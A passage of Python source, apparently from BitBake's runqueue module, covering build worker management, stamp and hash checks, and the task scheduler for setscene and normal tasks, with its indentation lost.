"fakerootnoenv" : self.rqdata.dataCaches[mc].fakerootnoenv,
"sigdata" : bb.parse.siggen.get_taskdata(),
"logdefaultlevel" : bb.msg.loggerDefaultLogLevel,
"logdefaultverbose" : bb.msg.loggerDefaultVerbose,
"logdefaultverboselogs" : bb.msg.loggerVerboseLogs,
"logdefaultdomain" : bb.msg.loggerDefaultDomains,
"prhost" : self.cooker.prhost,
"buildname" : self.cfgData.getVar("BUILDNAME"),
"date" : self.cfgData.getVar("DATE"),
"time" : self.cfgData.getVar("TIME"),
"hashservaddr" : self.cooker.hashservaddr,
}
worker.stdin.write(b"<cookerconfig>" + pickle.dumps(self.cooker.configuration) + b"</cookerconfig>")
worker.stdin.write(b"<extraconfigdata>" + pickle.dumps(self.cooker.extraconfigdata) + b"</extraconfigdata>")
worker.stdin.write(b"<workerdata>" + pickle.dumps(workerdata) + b"</workerdata>")
worker.stdin.flush()
return RunQueueWorker(worker, workerpipe)
def _teardown_worker(self, worker):
if not worker:
return
logger.debug(1, "Teardown for bitbake-worker")
try:
worker.process.stdin.write(b"<quit></quit>")
worker.process.stdin.flush()
worker.process.stdin.close()
except IOError:
pass
while worker.process.returncode is None:
worker.pipe.read()
worker.process.poll()
while worker.pipe.read():
continue
worker.pipe.close()
def start_worker(self):
if self.worker:
self.teardown_workers()
self.teardown = False
for mc in self.rqdata.dataCaches:
self.worker[mc] = self._start_worker(mc)
def start_fakeworker(self, rqexec, mc):
if not mc in self.fakeworker:
self.fakeworker[mc] = self._start_worker(mc, True, rqexec)
def teardown_workers(self):
self.teardown = True
for mc in self.worker:
self._teardown_worker(self.worker[mc])
self.worker = {}
for mc in self.fakeworker:
self._teardown_worker(self.fakeworker[mc])
self.fakeworker = {}
def read_workers(self):
for mc in self.worker:
self.worker[mc].pipe.read()
for mc in self.fakeworker:
self.fakeworker[mc].pipe.read()
def active_fds(self):
fds = []
for mc in self.worker:
fds.append(self.worker[mc].pipe.input)
for mc in self.fakeworker:
fds.append(self.fakeworker[mc].pipe.input)
return fds
def check_stamp_task(self, tid, taskname = None, recurse = False, cache = None):
def get_timestamp(f):
try:
if not os.access(f, os.F_OK):
return None
return os.stat(f)[stat.ST_MTIME]
except:
return None
(mc, fn, tn, taskfn) = split_tid_mcfn(tid)
if taskname is None:
taskname = tn
if self.stamppolicy == "perfile":
fulldeptree = False
else:
fulldeptree = True
stampwhitelist = []
if self.stamppolicy == "whitelist":
stampwhitelist = self.rqdata.stampfnwhitelist[mc]
stampfile = bb.build.stampfile(taskname, self.rqdata.dataCaches[mc], taskfn)
# If the stamp is missing, it's not current
if not os.access(stampfile, os.F_OK):
logger.debug(2, "Stampfile %s not available", stampfile)
return False
# If it's a 'nostamp' task, it's not current
taskdep = self.rqdata.dataCaches[mc].task_deps[taskfn]
if 'nostamp' in taskdep and taskname in taskdep['nostamp']:
logger.debug(2, "%s.%s is nostamp\n", fn, taskname)
return False
if taskname != "do_setscene" and taskname.endswith("_setscene"):
return True
if cache is None:
cache = {}
iscurrent = True
t1 = get_timestamp(stampfile)
for dep in self.rqdata.runtaskentries[tid].depends:
if iscurrent:
(mc2, fn2, taskname2, taskfn2) = split_tid_mcfn(dep)
stampfile2 = bb.build.stampfile(taskname2, self.rqdata.dataCaches[mc2], taskfn2)
stampfile3 = bb.build.stampfile(taskname2 + "_setscene", self.rqdata.dataCaches[mc2], taskfn2)
t2 = get_timestamp(stampfile2)
t3 = get_timestamp(stampfile3)
if t3 and not t2:
continue
if t3 and t3 > t2:
continue
if fn == fn2 or (fulldeptree and fn2 not in stampwhitelist):
if not t2:
logger.debug(2, 'Stampfile %s does not exist', stampfile2)
iscurrent = False
break
if t1 < t2:
logger.debug(2, 'Stampfile %s < %s', stampfile, stampfile2)
iscurrent = False
break
if recurse and iscurrent:
if dep in cache:
iscurrent = cache[dep]
if not iscurrent:
logger.debug(2, 'Stampfile for dependency %s:%s invalid (cached)' % (fn2, taskname2))
else:
iscurrent = self.check_stamp_task(dep, recurse=True, cache=cache)
cache[dep] = iscurrent
if recurse:
cache[tid] = iscurrent
return iscurrent
def validate_hashes(self, tocheck, data, currentcount=0, siginfo=False, summary=True):
valid = set()
if self.hashvalidate:
sq_data = {}
sq_data['hash'] = {}
sq_data['hashfn'] = {}
sq_data['unihash'] = {}
for tid in tocheck:
(mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
sq_data['hash'][tid] = self.rqdata.runtaskentries[tid].hash
sq_data['hashfn'][tid] = self.rqdata.dataCaches[mc].hashfn[taskfn]
sq_data['unihash'][tid] = self.rqdata.runtaskentries[tid].unihash
valid = self.validate_hash(sq_data, data, siginfo, currentcount, summary)
return valid
def validate_hash(self, sq_data, d, siginfo, currentcount, summary):
locs = {"sq_data" : sq_data, "d" : d, "siginfo" : siginfo, "currentcount" : currentcount, "summary" : summary}
# Metadata has **kwargs so args can be added, sq_data can also gain new fields
call = self.hashvalidate + "(sq_data, d, siginfo=siginfo, currentcount=currentcount, summary=summary)"
return bb.utils.better_eval(call, locs)
def _execute_runqueue(self):
"""
Run the tasks in a queue prepared by rqdata.prepare()
Upon failure, optionally try to recover the build using any alternate providers
(if the abort on failure configuration option isn't set)
"""
retval = True
if self.state is runQueuePrepare:
# NOTE: if you add, remove or significantly refactor the stages of this
# process then you should recalculate the weightings here. This is quite
# easy to do - just change the next line temporarily to pass debug=True as
# the last parameter and you'll get a printout of the weightings as well
# as a map to the lines where next_stage() was called. Of course this isn't
# critical, but it helps to keep the progress reporting accurate.
self.rqdata.init_progress_reporter = bb.progress.MultiStageProcessProgressReporter(self.cooker.data,
"Initialising tasks",
[43, 967, 4, 3, 1, 5, 3, 7, 13, 1, 2, 1, 1, 246, 35, 1, 38, 1, 35, 2, 338, 204, 142, 3, 3, 37, 244])
if self.rqdata.prepare() == 0:
self.state = runQueueComplete
else:
self.state = runQueueSceneInit
bb.parse.siggen.save_unitaskhashes()
if self.state is runQueueSceneInit:
self.rqdata.init_progress_reporter.next_stage()
# we are ready to run, emit dependency info to any UI or class which
# needs it
depgraph = self.cooker.buildDependTree(self, self.rqdata.taskData)
self.rqdata.init_progress_reporter.next_stage()
bb.event.fire(bb.event.DepTreeGenerated(depgraph), self.cooker.data)
if not self.dm_event_handler_registered:
res = bb.event.register(self.dm_event_handler_name,
lambda x: self.dm.check(self) if self.state in [runQueueRunning, runQueueCleanUp] else False,
('bb.event.HeartbeatEvent',))
self.dm_event_handler_registered = True
dump = self.cooker.configuration.dump_signatures
if dump:
self.rqdata.init_progress_reporter.finish()
if 'printdiff' in dump:
invalidtasks = self.print_diffscenetasks()
self.dump_signatures(dump)
if 'printdiff' in dump:
self.write_diffscenetasks(invalidtasks)
self.state = runQueueComplete
if self.state is runQueueSceneInit:
self.rqdata.init_progress_reporter.next_stage()
self.start_worker()
self.rqdata.init_progress_reporter.next_stage()
self.rqexe = RunQueueExecute(self)
# If we don't have any setscene functions, skip execution
if len(self.rqdata.runq_setscene_tids) == 0:
logger.info('No setscene tasks')
for tid in self.rqdata.runtaskentries:
if len(self.rqdata.runtaskentries[tid].depends) == 0:
self.rqexe.setbuildable(tid)
self.rqexe.tasks_notcovered.add(tid)
self.rqexe.sqdone = True
logger.info('Executing Tasks')
self.state = runQueueRunning
if self.state is runQueueRunning:
retval = self.rqexe.execute()
if self.state is runQueueCleanUp:
retval = self.rqexe.finish()
build_done = self.state is runQueueComplete or self.state is runQueueFailed
if build_done and self.dm_event_handler_registered:
bb.event.remove(self.dm_event_handler_name, None)
self.dm_event_handler_registered = False
if build_done and self.rqexe:
bb.parse.siggen.save_unitaskhashes()
self.teardown_workers()
if self.rqexe:
if self.rqexe.stats.failed:
logger.info("Tasks Summary: Attempted %d tasks of which %d didn't need to be rerun and %d failed.", self.rqexe.stats.completed + self.rqexe.stats.failed, self.rqexe.stats.skipped, self.rqexe.stats.failed)
else:
# Let's avoid the word "failed" if nothing actually did
logger.info("Tasks Summary: Attempted %d tasks of which %d didn't need to be rerun and all succeeded.", self.rqexe.stats.completed, self.rqexe.stats.skipped)
if self.state is runQueueFailed:
raise bb.runqueue.TaskFailure(self.rqexe.failed_tids)
if self.state is runQueueComplete:
# All done
return False
# Loop
return retval
def execute_runqueue(self):
# Catch unexpected exceptions and ensure we exit when an error occurs, not loop.
try:
return self._execute_runqueue()
except bb.runqueue.TaskFailure:
raise
except SystemExit:
raise
except bb.BBHandledException:
try:
self.teardown_workers()
except:
pass
self.state = runQueueComplete
raise
except Exception as err:
logger.exception("An uncaught exception occurred in runqueue")
try:
self.teardown_workers()
except:
pass
self.state = runQueueComplete
raise
def finish_runqueue(self, now = False):
if not self.rqexe:
self.state = runQueueComplete
return
if now:
self.rqexe.finish_now()
else:
self.rqexe.finish()
def rq_dump_sigfn(self, fn, options):
bb_cache = bb.cache.NoCache(self.cooker.databuilder)
mc = bb.runqueue.mc_from_tid(fn)
the_data = bb_cache.loadDataFull(fn, self.cooker.collections[mc].get_file_appends(fn))
siggen = bb.parse.siggen
dataCaches = self.rqdata.dataCaches
siggen.dump_sigfn(fn, dataCaches, options)
def dump_signatures(self, options):
fns = set()
bb.note("Reparsing files to collect dependency data")
for tid in self.rqdata.runtaskentries:
fn = fn_from_tid(tid)
fns.add(fn)
max_process = int(self.cfgData.getVar("BB_NUMBER_PARSE_THREADS") or os.cpu_count() or 1)
# We cannot use the real multiprocessing.Pool easily due to some local data
# that can't be pickled. This is a cheap multi-process solution.
launched = []
while fns:
if len(launched) < max_process:
p = Process(target=self.rq_dump_sigfn, args=(fns.pop(), options))
p.start()
launched.append(p)
for q in launched:
# The finished processes are joined when calling is_alive()
if not q.is_alive():
launched.remove(q)
for p in launched:
p.join()
bb.parse.siggen.dump_sigs(self.rqdata.dataCaches, options)
return
def print_diffscenetasks(self):
noexec = []
tocheck = set()
for tid in self.rqdata.runtaskentries:
(mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
taskdep = self.rqdata.dataCaches[mc].task_deps[taskfn]
if 'noexec' in taskdep and taskname in taskdep['noexec']:
noexec.append(tid)
continue
tocheck.add(tid)
valid_new = self.validate_hashes(tocheck, self.cooker.data, 0, True, summary=False)
# Tasks which are both setscene and noexec never care about dependencies
# We therefore find tasks which are setscene and noexec and mark their
# unique dependencies as valid.
for tid in noexec:
if tid not in self.rqdata.runq_setscene_tids:
continue
for dep in self.rqdata.runtaskentries[tid].depends:
hasnoexecparents = True
for dep2 in self.rqdata.runtaskentries[dep].revdeps:
if dep2 in self.rqdata.runq_setscene_tids and dep2 in noexec:
continue
hasnoexecparents = False
break
if hasnoexecparents:
valid_new.add(dep)
invalidtasks = set()
for tid in self.rqdata.runtaskentries:
if tid not in valid_new and tid not in noexec:
invalidtasks.add(tid)
found = set()
processed = set()
for tid in invalidtasks:
toprocess = set([tid])
while toprocess:
next = set()
for t in toprocess:
for dep in self.rqdata.runtaskentries[t].depends:
if dep in invalidtasks:
found.add(tid)
if dep not in processed:
processed.add(dep)
next.add(dep)
toprocess = next
if tid in found:
toprocess = set()
tasklist = []
for tid in invalidtasks.difference(found):
tasklist.append(tid)
if tasklist:
bb.plain("The differences between the current build and any cached tasks start at the following tasks:\n" + "\n".join(tasklist))
return invalidtasks.difference(found)
def write_diffscenetasks(self, invalidtasks):
# Define recursion callback
def recursecb(key, hash1, hash2):
hashes = [hash1, hash2]
hashfiles = bb.siggen.find_siginfo(key, None, hashes, self.cfgData)
recout = []
if len(hashfiles) == 2:
out2 = bb.siggen.compare_sigfiles(hashfiles[hash1], hashfiles[hash2], recursecb)
recout.extend(list(' ' + l for l in out2))
else:
recout.append("Unable to find matching sigdata for %s with hashes %s or %s" % (key, hash1, hash2))
return recout
for tid in invalidtasks:
(mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
pn = self.rqdata.dataCaches[mc].pkg_fn[taskfn]
h = self.rqdata.runtaskentries[tid].hash
matches = bb.siggen.find_siginfo(pn, taskname, [], self.cfgData)
match = None
for m in matches:
if h in m:
match = m
if match is None:
bb.fatal("Can't find a task we're supposed to have written out? (hash: %s)?" % h)
matches = {k : v for k, v in iter(matches.items()) if h not in k}
if matches:
latestmatch = sorted(matches.keys(), key=lambda f: matches[f])[-1]
prevh = __find_sha256__.search(latestmatch).group(0)
output = bb.siggen.compare_sigfiles(latestmatch, match, recursecb)
bb.plain("\nTask %s:%s couldn't be used from the cache because:\n We need hash %s, closest matching task was %s\n " % (pn, taskname, h, prevh) + '\n '.join(output))
class RunQueueExecute:
def __init__(self, rq):
self.rq = rq
self.cooker = rq.cooker
self.cfgData = rq.cfgData
self.rqdata = rq.rqdata
self.number_tasks = int(self.cfgData.getVar("BB_NUMBER_THREADS") or 1)
self.scheduler = self.cfgData.getVar("BB_SCHEDULER") or "speed"
self.sq_buildable = set()
self.sq_running = set()
self.sq_live = set()
self.updated_taskhash_queue = []
self.pending_migrations = set()
self.runq_buildable = set()
self.runq_running = set()
self.runq_complete = set()
self.runq_tasksrun = set()
self.build_stamps = {}
self.build_stamps2 = []
self.failed_tids = []
self.sq_deferred = {}
self.stampcache = {}
self.holdoff_tasks = set()
self.holdoff_need_update = True
self.sqdone = False
self.stats = RunQueueStats(len(self.rqdata.runtaskentries))
self.sq_stats = RunQueueStats(len(self.rqdata.runq_setscene_tids))
for mc in rq.worker:
rq.worker[mc].pipe.setrunqueueexec(self)
for mc in rq.fakeworker:
rq.fakeworker[mc].pipe.setrunqueueexec(self)
if self.number_tasks <= 0:
bb.fatal("Invalid BB_NUMBER_THREADS %s" % self.number_tasks)
# List of setscene tasks which we've covered
self.scenequeue_covered = set()
# List of tasks which are covered (including setscene ones)
self.tasks_covered = set()
self.tasks_scenequeue_done = set()
self.scenequeue_notcovered = set()
self.tasks_notcovered = set()
self.scenequeue_notneeded = set()
# We can't skip specified target tasks which aren't setscene tasks
self.cantskip = set(self.rqdata.target_tids)
self.cantskip.difference_update(self.rqdata.runq_setscene_tids)
self.cantskip.intersection_update(self.rqdata.runtaskentries)
schedulers = self.get_schedulers()
for scheduler in schedulers:
if self.scheduler == scheduler.name:
self.sched = scheduler(self, self.rqdata)
logger.debug(1, "Using runqueue scheduler '%s'", scheduler.name)
break
else:
bb.fatal("Invalid scheduler '%s'. Available schedulers: %s" %
(self.scheduler, ", ".join(obj.name for obj in schedulers)))
#if len(self.rqdata.runq_setscene_tids) > 0:
self.sqdata = SQData()
build_scenequeue_data(self.sqdata, self.rqdata, self.rq, self.cooker, self.stampcache, self)
def runqueue_process_waitpid(self, task, status):
# self.build_stamps[pid] may not exist when use shared work directory.
if task in self.build_stamps:
self.build_stamps2.remove(self.build_stamps[task])
del self.build_stamps[task]
if task in self.sq_live:
if status != 0:
self.sq_task_fail(task, status)
else:
self.sq_task_complete(task)
self.sq_live.remove(task)
else:
if status != 0:
self.task_fail(task, status)
else:
self.task_complete(task)
return True
def finish_now(self):
for mc in self.rq.worker:
try:
self.rq.worker[mc].process.stdin.write(b"<finishnow></finishnow>")
self.rq.worker[mc].process.stdin.flush()
except IOError:
# worker must have died?
pass
for mc in self.rq.fakeworker:
try:
self.rq.fakeworker[mc].process.stdin.write(b"<finishnow></finishnow>")
self.rq.fakeworker[mc].process.stdin.flush()
except IOError:
# worker must have died?
pass
if len(self.failed_tids) != 0:
self.rq.state = runQueueFailed
return
self.rq.state = runQueueComplete
return
def finish(self):
self.rq.state = runQueueCleanUp
active = self.stats.active + self.sq_stats.active
if active > 0:
bb.event.fire(runQueueExitWait(active), self.cfgData)
self.rq.read_workers()
return self.rq.active_fds()
if len(self.failed_tids) != 0:
self.rq.state = runQueueFailed
return True
self.rq.state = runQueueComplete
return True
# Used by setscene only
def check_dependencies(self, task, taskdeps):
if not self.rq.depvalidate:
return False
# Must not edit parent data
taskdeps = set(taskdeps)
taskdata = {}
taskdeps.add(task)
for dep in taskdeps:
(mc, fn, taskname, taskfn) = split_tid_mcfn(dep)
pn = self.rqdata.dataCaches[mc].pkg_fn[taskfn]
taskdata[dep] = [pn, taskname, fn]
call = self.rq.depvalidate + "(task, taskdata, notneeded, d)"
locs = { "task" : task, "taskdata" : taskdata, "notneeded" : self.scenequeue_notneeded, "d" : self.cooker.data }
valid = bb.utils.better_eval(call, locs)
return valid
def can_start_task(self):
active = self.stats.active + self.sq_stats.active
can_start = active < self.number_tasks
return can_start
def get_schedulers(self):
schedulers = set(obj for obj in globals().values()
if type(obj) is type and
issubclass(obj, RunQueueScheduler))
user_schedulers = self.cfgData.getVar("BB_SCHEDULERS")
if user_schedulers:
for sched in user_schedulers.split():
if not "." in sched:
bb.note("Ignoring scheduler '%s' from BB_SCHEDULERS: not an import" % sched)
continue
modname, name = sched.rsplit(".", 1)
try:
module = __import__(modname, fromlist=(name,))
except ImportError as exc:
logger.critical("Unable to import scheduler '%s' from '%s': %s" % (name, modname, exc))
raise SystemExit(1)
else:
schedulers.add(getattr(module, name))
return schedulers
def setbuildable(self, task):
self.runq_buildable.add(task)
self.sched.newbuildable(task)
def task_completeoutright(self, task):
"""
Mark a task as completed
Look at the reverse dependencies and mark any task with
completed dependencies as buildable
"""
self.runq_complete.add(task)
for revdep in self.rqdata.runtaskentries[task].revdeps:
if revdep in self.runq_running:
continue
if revdep in self.runq_buildable:
continue
alldeps = True
for dep in self.rqdata.runtaskentries[revdep].depends:
if dep not in self.runq_complete:
alldeps = False
break
if alldeps:
self.setbuildable(revdep)
logger.debug(1, "Marking task %s as buildable", revdep)
def task_complete(self, task):
self.stats.taskCompleted()
bb.event.fire(runQueueTaskCompleted(task, self.stats, self.rq), self.cfgData)
self.task_completeoutright(task)
self.runq_tasksrun.add(task)
def task_fail(self, task, exitcode):
"""
Called when a task has failed
Updates the state engine with the failure
"""
self.stats.taskFailed()
self.failed_tids.append(task)
bb.event.fire(runQueueTaskFailed(task, self.stats, exitcode, self.rq), self.cfgData)
if self.rqdata.taskData[''].abort:
self.rq.state = runQueueCleanUp
def task_skip(self, task, reason):
self.runq_running.add(task)
self.setbuildable(task)
bb.event.fire(runQueueTaskSkipped(task, self.stats, self.rq, reason), self.cfgData)
self.task_completeoutright(task)
self.stats.taskSkipped()
self.stats.taskCompleted()
def summarise_scenequeue_errors(self):
err = False
if not self.sqdone:
logger.debug(1, 'We could skip tasks %s', "\n".join(sorted(self.scenequeue_covered)))
completeevent = sceneQueueComplete(self.sq_stats, self.rq)
bb.event.fire(completeevent, self.cfgData)
if self.sq_deferred:
logger.error("Scenequeue had deferred entries: %s" % pprint.pformat(self.sq_deferred))
err = True
if self.updated_taskhash_queue:
logger.error("Scenequeue had unprocessed changed taskhash entries: %s" % pprint.pformat(self.updated_taskhash_queue))
err = True
if self.holdoff_tasks:
logger.error("Scenequeue had holdoff tasks: %s" % pprint.pformat(self.holdoff_tasks))
err = True
for tid in self.rqdata.runq_setscene_tids:
if tid not in self.scenequeue_covered and tid not in self.scenequeue_notcovered:
err = True
logger.error("Setscene Task %s was never marked as covered or not covered" % tid)
if tid not in self.sq_buildable:
err = True
logger.error("Setscene Task %s was never marked as buildable" % tid)
if tid not in self.sq_running:
err = True
logger.error("Setscene Task %s was never marked as running" % tid)
for x in self.rqdata.runtaskentries:
if x not in self.tasks_covered and x not in self.tasks_notcovered:
logger.error("Task %s was never moved from the setscene queue" % x)
err = True
if x not in self.tasks_scenequeue_done:
logger.error("Task %s was never processed by the setscene code" % x)
err = True
if len(self.rqdata.runtaskentries[x].depends) == 0 and x not in self.runq_buildable:
logger.error("Task %s was never marked as buildable by the setscene code" % x)
err = True
return err
def execute(self):
"""
Run the tasks in a queue prepared by prepare_runqueue
"""
self.rq.read_workers()
if self.updated_taskhash_queue or self.pending_migrations:
self.process_possible_migrations()
if not hasattr(self, "sorted_setscene_tids"):
# Don't want to sort this set every execution
self.sorted_setscene_tids = sorted(self.rqdata.runq_setscene_tids)
task = None
if not self.sqdone and self.can_start_task():
# Find the next setscene to run
for nexttask in self.sorted_setscene_tids:
if nexttask in self.sq_buildable and nexttask not in self.sq_running and self.sqdata.stamps[nexttask] not in self.build_stamps.values():
if nexttask not in self.sqdata.unskippable and len(self.sqdata.sq_revdeps[nexttask]) > 0 and self.sqdata.sq_revdeps[nexttask].issubset(self.scenequeue_covered) and self.check_dependencies(nexttask, self.sqdata.sq_revdeps[nexttask]):
if nexttask not in self.rqdata.target_tids:
logger.debug(2, "Skipping setscene for task %s" % nexttask)
self.sq_task_skip(nexttask)
self.scenequeue_notneeded.add(nexttask)
if nexttask in self.sq_deferred:
del self.sq_deferred[nexttask]
return True
# If covered tasks are running, need to wait for them to complete
for t in self.sqdata.sq_covered_tasks[nexttask]:
if t in self.runq_running and t not in self.runq_complete:
continue
if nexttask in self.sq_deferred:
if self.sq_deferred[nexttask] not in self.runq_complete:
continue
logger.debug(1, "Task %s no longer deferred" % nexttask)
del self.sq_deferred[nexttask]
valid = self.rq.validate_hashes(set([nexttask]), self.cooker.data, 0, False, summary=False)
if not valid:
logger.debug(1, "%s didn't become valid, skipping setscene" % nexttask)
self.sq_task_failoutright(nexttask)
return True
else:
self.sqdata.outrightfail.remove(nexttask)
if nexttask in self.sqdata.outrightfail:
logger.debug(2, 'No package found, so skipping setscene task %s', nexttask)
self.sq_task_failoutright(nexttask)
return True
if nexttask in self.sqdata.unskippable:
logger.debug(2, "Setscene task %s is unskippable" % nexttask)
task = nexttask
break
if task is not None:
(mc, fn, taskname, taskfn) = split_tid_mcfn(task)
taskname = taskname + "_setscene"
if self.rq.check_stamp_task(task, taskname_from_tid(task), recurse = True, cache=self.stampcache):
logger.debug(2, 'Stamp for underlying task %s is current, so skipping setscene variant', task)
self.sq_task_failoutright(task)
return True
if self.cooker.configuration.force:
if task in self.rqdata.target_tids:
self.sq_task_failoutright(task)
return True
if self.rq.check_stamp_task(task, taskname, cache=self.stampcache):
logger.debug(2, 'Setscene stamp current task %s, so skip it and its dependencies', task)
self.sq_task_skip(task)
return True
if self.cooker.configuration.skipsetscene:
logger.debug(2, 'No setscene tasks should be executed. Skipping %s', task)
self.sq_task_failoutright(task)
return True
startevent = sceneQueueTaskStarted(task, self.sq_stats, self.rq)
bb.event.fire(startevent, self.cfgData)
taskdepdata = self.sq_build_taskdepdata(task)
taskdep = self.rqdata.dataCaches[mc].task_deps[taskfn]
taskhash = self.rqdata.get_task_hash(task)
unihash = self.rqdata.get_task_unihash(task)
if 'fakeroot' in taskdep and taskname in taskdep['fakeroot'] and not self.cooker.configuration.dry_run:
if not mc in self.rq.fakeworker:
self.rq.start_fakeworker(self, mc)
self.rq.fakeworker[mc].process.stdin.write(b"<runtask>" + pickle.dumps((taskfn, task, taskname, taskhash, unihash, True, self.cooker.collections[mc].get_file_appends(taskfn), taskdepdata, False)) + b"</runtask>")
self.rq.fakeworker[mc].process.stdin.flush()
else:
self.rq.worker[mc].process.stdin.write(b"<runtask>" + pickle.dumps((taskfn, task, taskname, taskhash, unihash, True, self.cooker.collections[mc].get_file_appends(taskfn), taskdepdata, False)) + b"</runtask>")
self.rq.worker[mc].process.stdin.flush()
self.build_stamps[task] = bb.build.stampfile(taskname, self.rqdata.dataCaches[mc], taskfn, noextra=True)
self.build_stamps2.append(self.build_stamps[task])
self.sq_running.add(task)
self.sq_live.add(task)
self.sq_stats.taskActive()
if self.can_start_task():
return True
self.update_holdofftasks()
if not self.sq_live and not self.sqdone and not self.sq_deferred and not self.updated_taskhash_queue and not self.holdoff_tasks:
hashequiv_logger.verbose("Setscene tasks completed")
err = self.summarise_scenequeue_errors()
if err:
self.rq.state = runQueueFailed
return True
if self.cooker.configuration.setsceneonly:
self.rq.state = runQueueComplete
return True
self.sqdone = True
if self.stats.total == 0:
# nothing to do
self.rq.state = runQueueComplete
return True
if self.cooker.configuration.setsceneonly:
task = None
else:
task = self.sched.next()
if task is not None:
(mc, fn, taskname, taskfn) = split_tid_mcfn(task)
if self.rqdata.setscenewhitelist is not None:
if self.check_setscenewhitelist(task):
self.task_fail(task, "setscene whitelist")
return True
if task in self.tasks_covered:
logger.debug(2, "Setscene covered task %s", task)
self.task_skip(task, "covered")
return True
if self.rq.check_stamp_task(task, taskname, cache=self.stampcache):
logger.debug(2, "Stamp current task %s", task)
self.task_skip(task, "existing")
self.runq_tasksrun.add(task)
return True
taskdep = self.rqdata.dataCaches[mc].task_deps[taskfn]
if 'noexec' in taskdep and taskname in taskdep['noexec']:
startevent = runQueueTaskStarted(task, self.stats, self.rq,
noexec=True)
bb.event.fire(startevent, self.cfgData)
self.runq_running.add(task)
self.stats.taskActive()
if not (self.cooker.configuration.dry_run or self.rqdata.setscene_enforce):
bb.build.make_stamp(taskname, self.rqdata.dataCaches[mc], taskfn)
self.task_complete(task)
return True
else:
startevent = runQueueTaskStarted(task, self.stats, self.rq)
bb.event.fire(startevent, self.cfgData)
taskdepdata = self.build_taskdepdata(task)
taskdep = self.rqdata.dataCaches[mc].task_deps[taskfn]
taskhash = self.rqdata.get_task_hash(task)
unihash = self.rqdata.get_task_unihash(task)
if 'fakeroot' in taskdep and taskname in taskdep['fakeroot'] and not (self.cooker.configuration.dry_run or self.rqdata.setscene_enforce):
if not mc in self.rq.fakeworker:
try:
self.rq.start_fakeworker(self, mc)
except OSError as exc:
logger.critical("Failed to spawn fakeroot worker to run %s: %s" % (task, str(exc)))
self.rq.state = runQueueFailed
self.stats.taskFailed()
return True
self.rq.fakeworker[mc].process.stdin.write(b"<runtask>" + pickle.dumps((taskfn, task, taskname, taskhash, unihash, False, self.cooker.collections[mc].get_file_appends(taskfn), taskdepdata, self.rqdata.setscene_enforce)) + b"</runtask>")
self.rq.fakeworker[mc].process.stdin.flush()
else:
self.rq.worker[mc].process.stdin.write(b"<runtask>" + pickle.dumps((taskfn, task, taskname, taskhash, unihash, False, self.cooker.collections[mc].get_file_appends(taskfn), taskdepdata, self.rqdata.setscene_enforce)) + b"</runtask>")
self.rq.worker[mc].process.stdin.flush()
self.build_stamps[task] = bb.build.stampfile(taskname, self.rqdata.dataCaches[mc], taskfn, noextra=True)
self.build_stamps2.append(self.build_stamps[task])
self.runq_running.add(task)
self.stats.taskActive()
if self.can_start_task():
return True
if self.stats.active > 0 or self.sq_stats.active > 0:
self.rq.read_workers()
return self.rq.active_fds()
# No more tasks can be run. If we have deferred setscene tasks we should run them.
if self.sq_deferred:
tid = self.sq_deferred.pop(list(self.sq_deferred.keys())[0])
logger.warning("Runqeueue deadlocked on deferred tasks, forcing task %s" % tid)
self.sq_task_failoutright(tid)
return True
if len(self.failed_tids) != 0:
self.rq.state = runQueueFailed
return True
# Sanity Checks
err = self.summarise_scenequeue_errors()
for task in self.rqdata.runtaskentries:
if task not in self.runq_buildable:
logger.error("Task %s never buildable!", task)
err = True
elif task not in self.runq_running:
logger.error("Task %s never ran!", task)
err = True
elif task not in self.runq_complete:
logger.error("Task %s never completed!", task)
err = True
if err:
self.rq.state = runQueueFailed
else:
self.rq.state = runQueueComplete
return True
def filtermcdeps(self, task, mc, deps):
ret = set()
for dep in deps:
thismc = mc_from_tid(dep)
if thismc != mc:
continue
ret.add(dep)
return ret
# We filter out multiconfig dependencies from taskdepdata we pass to the tasks
# as most code can't handle them
def build_taskdepdata(self, task):
taskdepdata = {}
mc = mc_from_tid(task)
next = self.rqdata.runtaskentries[task].depends.copy()
next.add(task)
next = self.filtermcdeps(task, mc, next)
while next:
additional = []
for revdep in next:
(mc, fn, taskname, taskfn) = split_tid_mcfn(revdep)
pn = self.rqdata.dataCaches[mc].pkg_fn[taskfn]
deps = self.rqdata.runtaskentries[revdep].depends
provides = self.rqdata.dataCaches[mc].fn_provides[taskfn]
taskhash = self.rqdata.runtaskentries[revdep].hash
unihash = self.rqdata.runtaskentries[revdep].unihash
deps = self.filtermcdeps(task, mc, deps)
taskdepdata[revdep] = [pn, taskname, fn, deps, provides, taskhash, unihash]
for revdep2 in deps:
if revdep2 not in taskdepdata:
additional.append(revdep2)
next = additional
#bb.note("Task %s: " % task + str(taskdepdata).replace("], ", "],\n"))
return taskdepdata
def update_holdofftasks(self):
if not self.holdoff_need_update:
return
notcovered = set(self.scenequeue_notcovered)
notcovered |= self.cantskip
for tid in self.scenequeue_notcovered:
notcovered |= self.sqdata.sq_covered_tasks[tid]
notcovered |= self.sqdata.unskippable.difference(self.rqdata.runq_setscene_tids)
notcovered.intersection_update(self.tasks_scenequeue_done)
covered = set(self.scenequeue_covered)
for tid in self.scenequeue_covered:
covered |= self.sqdata.sq_covered_tasks[tid]
covered.difference_update(notcovered)
covered.intersection_update(self.tasks_scenequeue_done)
for tid in notcovered | covered:
if len(self.rqdata.runtaskentries[tid].depends) == 0:
self.setbuildable(tid)
elif self.rqdata.runtaskentries[tid].depends.issubset(self.runq_complete):
self.setbuildable(tid)
self.tasks_covered = covered
self.tasks_notcovered = notcovered
self.holdoff_tasks = set()
for tid in self.rqdata.runq_setscene_tids:
if tid not in self.scenequeue_covered and tid not in self.scenequeue_notcovered:
self.holdoff_tasks.add(tid)
for tid in self.holdoff_tasks.copy():
for dep in self.sqdata.sq_covered_tasks[tid]:
if dep not in self.runq_complete:
self.holdoff_tasks.add(dep)
self.holdoff_need_update = False
def process_possible_migrations(self):
changed = set()
toprocess = set()
for tid, unihash in self.updated_taskhash_queue.copy():
if tid in self.runq_running and tid not in self.runq_complete:
continue
self.updated_taskhash_queue.remove((tid, unihash))
if unihash != self.rqdata.runtaskentries[tid].unihash:
hashequiv_logger.verbose("Task %s unihash changed to %s" % (tid, unihash))
self.rqdata.runtaskentries[tid].unihash = unihash
bb.parse.siggen.set_unihash(tid, unihash)
toprocess.add(tid)
# Work out all tasks which depend upon these
total = set()
next = set()
for p in toprocess:
next |= self.rqdata.runtaskentries[p].revdeps
while next:
current = next.copy()
total = total | next
next = set()
for ntid in current:
next |= self.rqdata.runtaskentries[ntid].revdeps
